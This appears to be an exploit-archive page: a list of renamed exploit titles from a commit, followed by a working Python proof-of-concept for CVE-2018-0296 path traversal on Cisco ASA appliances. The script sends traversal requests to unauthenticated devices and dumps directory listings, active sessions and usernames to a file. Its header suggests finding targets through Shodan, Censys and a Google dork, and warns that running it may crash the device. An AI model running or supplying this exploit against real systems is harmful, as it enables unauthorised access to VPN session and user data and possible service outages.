fdf8bfe785
5 changes to exploits/shellcodes Microsoft Windows - WRITE_ANDX SMB command handling Kernel Denial of Service (Metasploit) Microsoft Windows - 'WRITE_ANDX' SMB Command Handling Kernel Denial of Service (Metasploit) freeSSHd 1.2.1 - (Authenticated) SFTP rename Remote Buffer Overflow (PoC) freeSSHd 1.2.1 - (Authenticated) SFTP 'rename' Remote Buffer Overflow (PoC) freeSSHd 1.2.1 - (Authenticated) SFTP realpath Remote Buffer Overflow (PoC) freeSSHd 1.2.1 - (Authenticated) SFTP 'realpath' Remote Buffer Overflow (PoC) Novell Groupwise 8.0 - Malformed RCPT Command Off-by-One Novell Groupwise 8.0 - 'RCPT' Off-by-One WarFTPd 1.82.00-RC12 - LIST command Format String Denial of Service WarFTPd 1.82.00-RC12 - 'LIST' Format String Denial of Service Sysax Multi Server < 5.25 (SFTP Module) - Multiple Commands Denial of Service Vulnerabilities Sysax Multi Server < 5.25 (SFTP Module) - Multiple Denial of Service Vulnerabilities Novell Groupwise Internet Agent - IMAP LIST Command Remote Code Execution Novell Groupwise Internet Agent - IMAP LIST LSUB Command Remote Code Execution Novell Groupwise Internet Agent - IMAP 'LIST' Remote Code Execution Novell Groupwise Internet Agent - IMAP 'LIST LSUB' Remote Code Execution Solar FTP Server 2.0 - Multiple Commands Denial of Service Vulnerabilities Solar FTP Server 2.0 - Multiple Denial of Service Vulnerabilities LiteServe 2.81 - PASV Command Denial of Service LiteServe 2.81 - 'PASV' Denial of Service Notepad++ NppFTP plugin - LIST command Remote Heap Overflow (PoC) Notepad++ NppFTP Plugin - 'LIST' Remote Heap Overflow (PoC) TYPSoft FTP Server 1.10 - Multiple Commands Denial of Service Vulnerabilities TYPSoft FTP Server 1.10 - Multiple Denial of Service Vulnerabilities WFTPD 2.4.1RC11 - STAT/LIST Command Denial of Service WFTPD 2.4.1RC11 - 'STAT'/'LIST' Denial of Service WFTPD 2.4.1RC11 - MLST Command Remote Denial of Service WFTPD 2.4.1RC11 - 'MLST' Remote Denial of Service Oracle 8i - dbsnmp Command Remote Denial of Service Oracle 8i - 'dbsnmp' Remote Denial of Service Mollensoft Software Enceladus Server Suite 3.9 - FTP Command Buffer Overflow Mollensoft Software Enceladus Server Suite 3.9 - 'FTP' Buffer Overflow GuildFTPd 0.999.8 - CWD Command Denial of Service GuildFTPd 0.999.8 - 'CWD' Denial of Service Xlight FTP Server 1.25/1.41 - PASS Command Remote Buffer Overflow Xlight FTP Server 1.25/1.41 - 'PASS' Remote Buffer Overflow RobotFTP Server 1.0/2.0 - Remote Command Denial of Service RobotFTP Server 1.0/2.0 - Remote Denial of Service RhinoSoft Serv-U FTPd Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (1) RhinoSoft Serv-U FTPd Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (2) RhinoSoft Serv-U FTPd Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (3) RhinoSoft Serv-U FTPd Server 3/4/5 - 'MDTM' Time Argument Buffer Overflow (1) RhinoSoft Serv-U FTPd Server 3/4/5 - 'MDTM' Time Argument Buffer Overflow (2) RhinoSoft Serv-U FTPd Server 3/4/5 - 'MDTM' Time Argument Buffer Overflow (3) Opera Web Browser 7.54 - KDE KFMCLIENT Remote Command Execution Opera Web Browser 7.54 - 'KDE KFMCLIENT' Remote Command Execution MailEnable 1.x - SMTP HELO Command Remote Denial of Service MailEnable 1.x - SMTP 'HELO' Remote Denial of Service HP Printer FTP Print Server 2.4.5 - List Command Buffer Overflow HP Printer FTP Print Server 2.4.5 - 'LIST' Buffer Overflow HP JetDirect FTP Print Server - RERT Command Denial of Service HP JetDirect FTP Print Server - 'RERT' Denial of Service FSD 2.052/3.000 - servinterface.cc servinterface::sendmulticast Function PIcallsign Command Remote Overflow FSD 2.052/3.000 - 'servinterface.cc servinterface::sendmulticast' 'PIcallsign' Command Remote Overflow freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Remote Denial of Service Qbik WinGate 6.2.2 - LIST Command Remote Denial of Service Qbik WinGate 6.2.2 - 'LIST' Remote Denial of Service Quick 'n Easy FTP Server 3.9.1 - USER Command Remote Buffer Overflow Quick 'n Easy FTP Server 3.9.1 - 'USER' Remote Buffer Overflow Ability FTP Server 2.1.4 - 'afsmain.exe' USER Command Remote Denial of Service Ability FTP Server 2.1.4 - Admin Panel AUTHCODE Command Remote Denial of Service Ability FTP Server 2.1.4 - 'afsmain.exe' 'USER' Remote Denial of Service Ability FTP Server 2.1.4 - Admin Panel 'AUTHCODE' Remote Denial of Service Resolv+ (RESOLV_HOST_CONF) - Linux Library Command Execution Resolv+ 'RESOLV_HOST_CONF' - Linux Library Command Execution Platform Load Sharing Facility 4/5 - LSF_ENVDIR Local Command Execution Platform Load Sharing Facility 4/5 - 'LSF_ENVDIR' Local Command Execution Trend Micro Internet Security 2010 - 'UfPBCtrl.DLL' ActiveX Remote Command Exeuction Trend Micro Internet Security 2010 - 'UfPBCtrl.DLL' ActiveX Remote Command Execution Golden FTP Server 4.70 - PASS Command Buffer Overflow Golden FTP Server 4.70 - 'PASS' Buffer Overflow EasyFTP Server 1.7.0.11 - MKD Command Stack Buffer Overflow (Metasploit) EasyFTP Server 1.7.0.11 - 'MKD' Stack Buffer Overflow (Metasploit) Vermillion FTP Daemon - PORT Command Memory Corruption (Metasploit) Vermillion FTP Daemon - 'PORT' Memory Corruption (Metasploit) EasyFTP Server 1.7.0.11 - LIST Command Stack Buffer Overflow (Metasploit) EasyFTP Server 1.7.0.11 - 'LIST' Stack Buffer Overflow (Metasploit) EasyFTP Server 1.7.0.11 - CWD Command Stack Buffer Overflow (Metasploit) EasyFTP Server 1.7.0.11 - 'CWD' Stack Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - connectedNodes.ovpl Remote Command Execution (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'connectedNodes.ovp'l Remote Command Execution (Metasploit) Zabbix Agent - net.tcp.listen Command Injection (Metasploit) Zabbix Agent - 'net.tcp.listen' Command Injection (Metasploit) Actfax FTP Server 4.27 - USER Command Stack Buffer Overflow (Metasploit) Actfax FTP Server 4.27 - 'USER' Stack Buffer Overflow (Metasploit) HP-UX 10/11/ IRIX 3/4/5/6 / OpenSolaris build snv / Solaris 8/9/10 / SunOS 4.1 - rpc.ypupdated Command Execution (1) HP-UX 10/11/ IRIX 3/4/5/6 / OpenSolaris build snv / Solaris 8/9/10 / SunOS 4.1 - rpc.ypupdated Command Execution (2) HP-UX 10/11/ IRIX 3/4/5/6 / OpenSolaris build snv / Solaris 8/9/10 / SunOS 4.1 - 'rpc.ypupdated' Command Execution (1) HP-UX 10/11/ IRIX 3/4/5/6 / OpenSolaris build snv / Solaris 8/9/10 / SunOS 4.1 - 'rpc.ypupdated' Command Execution (2) Majordomo 1.89/1.90 - lists Command Execution Majordomo 1.89/1.90 - 'lists' Command Execution PALS Library System WebPALS 1.0 - pals-cgi Arbitrary Command Execution PALS Library System WebPALS 1.0 - 'pals-cgi' Arbitrary Command Execution SGI IRIX 6.x - rpc.xfsmd Remote Command Execution SGI IRIX 6.x - 'rpc.xfsmd' Remote Command Execution HP-UX FTPD 1.1.214.4 - REST Command Memory Disclosure HP-UX FTPD 1.1.214.4 - 'REST' Memory Disclosure Sami FTP Server 2.0.1 - LIST Command Buffer Overflow Sami FTP Server 2.0.1 - 'LIST' Buffer Overflow Sami FTP Server - LIST Command Buffer Overflow (Metasploit) Sami FTP Server - 'LIST' Buffer Overflow (Metasploit) PineApp Mail-SeCure - livelog.html Arbitrary Command Execution (Metasploit) PineApp Mail-SeCure - 'livelog.html' Arbitrary Command Execution (Metasploit) FSD 2.052/3.000 - sysuser.cc sysuser::exechelp Function HELP Command Remote Overflow FSD 2.052/3.000 - 'sysuser.cc sysuser::exechelp' 'HELP' Remote Overflow HP Data Protector - EXEC_BAR Remote Command Execution HP Data Protector - 'EXEC_BAR' Remote Command Execution IPtools 0.1.4 - Remote Command Server Buffer Overflow IPtools 0.1.4 - Remote Buffer Overflow TWiki 20030201 - search.pm Remote Command Execution TWiki 20030201 - 'search.pm' Remote Command Execution AWStats 6.0 < 6.2 - configdir Remote Command Execution (C) AWStats 6.0 < 6.2 - configdir Remote Command Execution (Perl) AWStats 6.0 < 6.2 - 'configdir' Remote Command Execution (C) AWStats 6.0 < 6.2 - 'configdir' Remote Command Execution (Perl) Guppy 4.5.9 - 'REMOTE_ADDR' Remote Commands Execution Guppy 4.5.9 - 'REMOTE_ADDR' Remote Command Execution SimpleBBS 1.1 - Remote Commands Execution SimpleBBS 1.1 - Remote Command Execution SimpleBBS 1.1 - Remote Commands Execution (C) SimpleBBS 1.1 - Remote Command Execution (C) Flatnuke 2.5.6 - Privilege Escalation / Remote Commands Execution Flatnuke 2.5.6 - Privilege Escalation / Remote Command Execution phpBB 2.0.17 - 'signature_bbcode_uid' Remote Command phpDocumentor 1.3.0 rc4 - Remote Commands Execution phpBB 2.0.17 - 'signature_bbcode_uid' Remot Command phpDocumentor 1.3.0 rc4 - Remote Command Execution CPGNuke Dragonfly 9.0.6.1 - Remote Commands Execution SPIP 1.8.2g - Remote Commands Execution CPGNuke Dragonfly 9.0.6.1 - Remote Command Execution SPIP 1.8.2g - Remote Command Execution DocMGR 0.54.2 - 'file_exists' Remote Commands Execution DocMGR 0.54.2 - 'file_exists' Remote Command Execution EnterpriseGS 1.0 rc4 - Remote Commands Execution FlySpray 0.9.7 - 'install-0.9.7.php' Remote Commands Execution EnterpriseGS 1.0 rc4 - Remote Command Execution FlySpray 0.9.7 - 'install-0.9.7.php' Remote Command Execution PHPKIT 1.6.1R2 - 'filecheck' Remote Commands Execution PHPKIT 1.6.1R2 - 'filecheck' Remote Command Execution Coppermine Photo Gallery 1.4.3 - Remote Commands Execution Coppermine Photo Gallery 1.4.3 - Remote Command Execution GeekLog 1.x - 'error.log' (gpc = Off) Remote Commands Execution GeekLog 1.x - 'error.log' Remote Command Execution PHP-Stats 0.1.9.1 - Remote Commands Execution PHP-Stats 0.1.9.1 - Remote Commans Execution Gallery 2.0.3 - stepOrder[] Remote Commands Execution Gallery 2.0.3 - 'stepOrder[]' Remote Command Execution phpList 2.10.2 - GLOBALS[] Remote Code Execution phpList 2.10.2 - 'GLOBALS[]' Remote Code Execution Simplog 0.9.2 - 's' Remote Commands Execution Simplog 0.9.2 - 's' Remote Command Execution phpWebSite 0.10.2 - 'hub_dir' Remote Commands Execution phpWebSite 0.10.2 - 'hub_dir' Remote Command Execution phpGroupWare 0.9.16.010 - GLOBALS[] Remote Code Execution phpGroupWare 0.9.16.010 - 'GLOBALS[]' Remote Code Execution GuppY 4.5.16 - Remote Commands Execution GuppY 4.5.16 - Remote Command Execution AWStats 6.1 < 6.2 - configdir Remote Command Execution (Metasploit) AWStats 6.1 < 6.2 - 'configdir' Remote Command Execution (Metasploit) Achievo 0.7/0.8/0.9 - Remote File Inclusion Command Execution Achievo 0.7/0.8/0.9 - Remote File Inclusion / Command Execution SiteInteractive Subscribe Me - Setup.pl Arbitrary Command Execution SiteInteractive Subscribe Me - 'Setup.pl' Arbitrary Command Execution BEESCMS 4.0 - Cross-Site Request Forgery (Add Admin) HongCMS 3.0.0 - SQL Injection hycus CMS 1.0.4 - Authentication Bypass DIGISOL DG-HR3400 Wireless Router - Cross-Site Scripting Cisco Adaptive Security Appliance - Path Traversal
107 lines
No EOL
4.7 KiB
Python
Executable file
107 lines
No EOL
4.7 KiB
Python
Executable file
'''
|
|
Cisco Adaptive Security Appliance - Path Traversal (CVE-2018-0296)
|
|
A security vulnerability in Cisco ASA that would allow an attacker to view sensitive system information without authentication by using directory traversal techniques.
|
|
|
|
Vulnerable Products
|
|
This vulnerability affects Cisco ASA Software and Cisco Firepower Threat Defense (FTD) Software that is running on the following Cisco products:
|
|
|
|
3000 Series Industrial Security Appliance (ISA)
|
|
ASA 1000V Cloud Firewall
|
|
ASA 5500 Series Adaptive Security Appliances
|
|
ASA 5500-X Series Next-Generation Firewalls
|
|
ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
|
|
Adaptive Security Virtual Appliance (ASAv)
|
|
Firepower 2100 Series Security Appliance
|
|
Firepower 4100 Series Security Appliance
|
|
Firepower 9300 ASA Security Module
|
|
FTD Virtual (FTDv)
|
|
Script usage
|
|
Installation: git clone https://github.com/yassineaboukir/CVE-2018-0296.git
|
|
Usage: python cisco_asa.py <URL>
|
|
If the web server is vulnerable, the script will dump in a text file both the content of the current directory, files in +CSCOE+ and active sessions.
|
|
|
|
Disclaimer: please note that due to the nature of the vulnerability disclosed to Cisco, this exploit could result in a DoS so test at your own risk.
|
|
|
|
Bug Bounty Recon
|
|
You can use Shodan, Censys or any other OSINT tools to enumerate vulnerable servers or simply google dork /+CSCOE+/logon.html. Figure it out :)
|
|
|
|
References:
|
|
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180606-asaftd
|
|
'''
|
|
|
|
#!/usr/bin/env python
|
|
|
|
import requests
|
|
import sys
|
|
import urlparse
|
|
import os
|
|
import re
|
|
|
|
print("""
|
|
_____ _____ _____ _____ _____ ___ _____ ___
|
|
/ __ \_ _/ ___/ __ \ _ | / _ \ / ___|/ _ \
|
|
| / \/ | | \ `--.| / \/ | | | / /_\ \\ `--./ /_\ \
|
|
| | | | `--. \ | | | | | | _ | `--. \ _ |
|
|
| \__/\_| |_/\__/ / \__/\ \_/ / | | | |/\__/ / | | |
|
|
\____/\___/\____/ \____/\___/ \_| |_/\____/\_| |_/
|
|
|
|
______ _ _ _____ _
|
|
| ___ \ | | | | |_ _| | |
|
|
| |_/ /_ _| |_| |__ | |_ __ __ ___ _____ _ __ ___ __ _| |
|
|
| __/ _` | __| '_ \ | | '__/ _` \ \ / / _ \ '__/ __|/ _` | |
|
|
| | | (_| | |_| | | | | | | | (_| |\ V / __/ | \__ \ (_| | |
|
|
\_| \__,_|\__|_| |_| \_/_| \__,_| \_/ \___|_| |___/\__,_|_|
|
|
|
|
CVE-2018-0296
|
|
Script author: Yassine Aboukir(@yassineaboukir)
|
|
""")
|
|
|
|
requests.packages.urllib3.disable_warnings()
|
|
|
|
url = sys.argv[1]
|
|
|
|
regexSess = r"([0-9])\w+'"
|
|
regexUser = r"(user:)\w+"
|
|
|
|
dir_path = os.path.dirname(os.path.realpath(__file__))
|
|
filelist_dir = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=/"
|
|
CSCOE_dir = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b"
|
|
active_sessions = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/"
|
|
logon = "/+CSCOE+/logon.html"
|
|
|
|
try:
|
|
is_cisco_asa = requests.get(urlparse.urljoin(url,logon), verify=False, allow_redirects=False)
|
|
except requests.exceptions.RequestException as e:
|
|
print(e)
|
|
sys.exit(1)
|
|
|
|
if "webvpnLang" in is_cisco_asa.cookies:
|
|
try:
|
|
filelist_r = requests.get(urlparse.urljoin(url,filelist_dir), verify=False)
|
|
CSCOE_r = requests.get(urlparse.urljoin(url,CSCOE_dir), verify=False)
|
|
active_sessions_r = requests.get(urlparse.urljoin(url,active_sessions), verify=False)
|
|
|
|
except requests.exceptions.RequestException as e:
|
|
print(e)
|
|
sys.exit(1)
|
|
|
|
if str(filelist_r.status_code) == "200":
|
|
with open(urlparse.urlparse(url).hostname+".txt", "w") as cisco_dump:
|
|
cisco_dump.write("======= Directory Index =========\n {}\n ======== +CSCEO+ Directory ========\n {}\n ======= Active sessions =========\n {}\n ======= Active Users =========\n".format(filelist_r.text, CSCOE_r.text, active_sessions_r.text))
|
|
|
|
''' Extraccion de usuarios'''
|
|
matches_sess = re.finditer(regexSess, active_sessions_r.text)
|
|
for match_sess in matches_sess:
|
|
active_users_r = requests.get(urlparse.urljoin(url,"/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/"+str(match_sess.group().strip("'"))), verify=False)
|
|
matches_user = re.finditer(regexUser, active_users_r.text)
|
|
|
|
for match_user in matches_user:
|
|
cisco_dump.write(match_user.group()+"\n")
|
|
''' Fin Extraccion de usuarios'''
|
|
|
|
print("Vulnerable! Check the text dump saved in {}".format(dir_path))
|
|
else: print("Not vulnerable!")
|
|
|
|
else:
|
|
print("This is not Cisco ASA! e.g: https://vpn.example.com/+CSCOE+/logon.html\n")
|
|
sys.exit(1) |